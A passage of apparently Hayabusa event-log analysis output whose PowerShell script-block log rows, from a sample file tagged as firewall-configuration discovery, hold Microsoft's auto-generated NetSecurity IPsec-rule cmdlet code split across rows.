[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Param",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = 